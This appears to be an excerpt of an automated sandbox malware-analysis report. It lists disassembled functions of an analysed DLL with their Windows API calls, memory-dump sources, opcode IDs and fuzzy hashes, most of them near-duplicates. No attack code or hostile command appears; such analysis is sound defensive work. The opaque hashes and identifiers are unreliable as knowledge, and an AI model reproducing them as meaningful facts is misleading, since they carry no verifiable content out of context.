                                                          • Instruction Fuzzy Hash: 8A312D70A01618DFCB60DF69DC84B9DB7B9AF85204F24859AE418E7641CB72DD418F60
                                                          Function 6CF701BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 670b64a5a0859606d201adae7cd0cdc3ac1f0c6d6ba423918dfb4fcefc3daa3c
                                                          • Instruction ID: 243859a73d7e76b0b94f3b0bd6115dc63bb5a26a20afb8e30928bfabb586610e
                                                          • Opcode Fuzzy Hash: 670b64a5a0859606d201adae7cd0cdc3ac1f0c6d6ba423918dfb4fcefc3daa3c
                                                          • Instruction Fuzzy Hash: D5314F70E01618DFDB20DF69DC84B5DB7B9AF85204F24859AE418E7641C772DD408F60
                                                          Function 6CF702C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: aedb8c8734c81f2ab96900609a9617e4238b16d0ea5f0480bc7d4831b4120c87
                                                          • Instruction ID: 848b3f273c408507a3fb4e7f71dd961f897327e0c3ec9be201e6eecd37cf14d1
                                                          • Opcode Fuzzy Hash: aedb8c8734c81f2ab96900609a9617e4238b16d0ea5f0480bc7d4831b4120c87
                                                          • Instruction Fuzzy Hash: 1A314DB0A01618DFCB10CFA9DC84B9DB7B9AF85204F30869AE418E7642CB72DD40CF60
                                                          Function 6CF703DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 1ae7aa34ad47881cc89b4ea689fa2ee11976fb9cafb425400be0a0a4b4878201
                                                          • Instruction ID: d91ade034ff8a7db591101b88221ec8c90f672b7042b487f8a3068e407bdd676
                                                          • Opcode Fuzzy Hash: 1ae7aa34ad47881cc89b4ea689fa2ee11976fb9cafb425400be0a0a4b4878201
                                                          • Instruction Fuzzy Hash: 99312F70E01618DFCB60CF69DC84B9DB7B9AF85204F34869AE418E7655CB72DD408F60
                                                          Function 6CF6FD9F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 988fd7192cb13dc0e191263a2e8145f7afeb3abed83c50f5b2e97147354578b1
                                                          • Instruction ID: 70f2ee6870d72816aac43e92919bf6e1391ed24e5e2947f4e502021d6eae9210
                                                          • Opcode Fuzzy Hash: 988fd7192cb13dc0e191263a2e8145f7afeb3abed83c50f5b2e97147354578b1
                                                          • Instruction Fuzzy Hash: A0313CB0E01618DFCB50CFA9DC84B9DB7B9AF85204F34859AE418E7641CB72ED418F60
                                                          Function 6CF79011 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: bc47675cf9e056093f0c41d91a15409db9876c3e375fb0163684cb0b3bb65573
                                                          • Instruction ID: bab293112ab20b85b4f2619cae2900531bb66e354eac6a9b13e27058f91f6d81
                                                          • Opcode Fuzzy Hash: bc47675cf9e056093f0c41d91a15409db9876c3e375fb0163684cb0b3bb65573
                                                          • Instruction Fuzzy Hash: 29314C70E016189FCB20DB69DC84B9EB7F9AF89204F24868AE419E7641DB71ED40CF60
                                                          Function 6CFC249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CFC25B1,?,00000000,?), ref: 6CFC24E6
                                                          • _malloc.LIBCMT ref: 6CFC251B
                                                          • _memset.LIBCMT ref: 6CFC253B
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CFC2550
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CFC255E
                                                          • __freea.LIBCMT ref: 6CFC2568
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                          • String ID:
                                                          • API String ID: 525495869-0
                                                          • Opcode ID: f2550d05ff3edb5236bf4b32da0d035f5551017e579659e27f10e0450c6e8477
                                                          • Instruction ID: 501563a6e47ace9818a07d91436026e83db504ed858fbde75f7a37f0f339c57e
                                                          • Opcode Fuzzy Hash: f2550d05ff3edb5236bf4b32da0d035f5551017e579659e27f10e0450c6e8477
                                                          • Instruction Fuzzy Hash: 1631BDB1B1020AAFEB008F69DC84EAF7BA8EB08358F105425F914E2650EB36DD148B61
                                                          Function 6CF78A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                          • String ID:
                                                          • API String ID: 757764206-0
                                                          • Opcode ID: bcdff307bc673f83cf318251efb96b42cb5a95438488ffc64e9d5842fa96daf8
                                                          • Instruction ID: 4b890f07b552f12f6d602256982f64faccebb610411ccf64e5c32787b540f89a
                                                          • Opcode Fuzzy Hash: bcdff307bc673f83cf318251efb96b42cb5a95438488ffc64e9d5842fa96daf8
                                                          • Instruction Fuzzy Hash: 67311971E016189FCB20DB69DC80B9EB7FAAF99304F25468AE419E7641C775ED80CF60
                                                          Function 6CF787EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                          • String ID:
                                                          • API String ID: 757764206-0
                                                          • Opcode ID: b128eac9fa9866dafcfd385e3282d965164f6124c6097c18759619df4dfae02c
                                                          • Instruction ID: 622857847c3c196ec74c0c46a04a26f70020cae9bed8a6622a9c3d4ddf5d3741
                                                          • Opcode Fuzzy Hash: b128eac9fa9866dafcfd385e3282d965164f6124c6097c18759619df4dfae02c
                                                          • Instruction Fuzzy Hash: 70314A70E016189FCB20CB69DC80B9EB7FAAF95304F20468BE419E7641C775ED808F60
                                                          Function 6CF6FD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                          • String ID:
                                                          • API String ID: 757764206-0
                                                          • Opcode ID: b128eac9fa9866dafcfd385e3282d965164f6124c6097c18759619df4dfae02c
                                                          • Instruction ID: 813aee6ba15a9b14a21b6006e708fcbf82fc92f9a5eaf9756b6f03b015334741
                                                          • Opcode Fuzzy Hash: b128eac9fa9866dafcfd385e3282d965164f6124c6097c18759619df4dfae02c
                                                          • Instruction Fuzzy Hash: C5314B70E01618DBCB10CF69DC84B9DB7BAAF85304F30458AE418E7641CB729D808F60
                                                          Function 6CF6FF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF769C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF76A08
                                                            • Part of subcall function 6CF769C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF76A15
                                                            • Part of subcall function 6CF769C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF76A41
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Destroy$Bound$Element
                                                          • String ID:
                                                          • API String ID: 757764206-0
                                                          • Opcode ID: bcdff307bc673f83cf318251efb96b42cb5a95438488ffc64e9d5842fa96daf8
                                                          • Instruction ID: c4dabc1c0d28dc30921282589d5be16030c6a3516b011a81c8d240d1be9d558c
                                                          • Opcode Fuzzy Hash: bcdff307bc673f83cf318251efb96b42cb5a95438488ffc64e9d5842fa96daf8
                                                          • Instruction Fuzzy Hash: D6312F71E01618DFCB54CF69DC84B9DB7B9AF85304F20468AE419E7A41C7769D808F60
                                                          Function 6CFB06A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54760: __CxxThrowException@8.LIBCMT ref: 6CF547F9
                                                          • _memmove.LIBCMT ref: 6CFB0907
                                                          • _memmove.LIBCMT ref: 6CFB0936
                                                          • _memmove.LIBCMT ref: 6CFB0959
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB0A25
                                                          Strings
                                                          • PSSR_MEM: message recovery disabled, xrefs: 6CFB09E3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throw
                                                          • String ID: PSSR_MEM: message recovery disabled
                                                          • API String ID: 2655171816-3051149714
                                                          • Opcode ID: c7b0c161bb23f47bbb0fe7c6b5c5410b0576556262e9483066ebd3ceebf64292
                                                          • Instruction ID: 9f003b045fcfc282297cc8d5692e46594c9f866bd71178ce6704c7c19bb3099d
                                                          • Opcode Fuzzy Hash: c7b0c161bb23f47bbb0fe7c6b5c5410b0576556262e9483066ebd3ceebf64292
                                                          • Instruction Fuzzy Hash: A0C168B56093819FD714CF29C980B6BBBE5BFC9304F148A5CE58987385DB70E905CBA2
                                                          Function 6CFB7FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CFB80EA
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
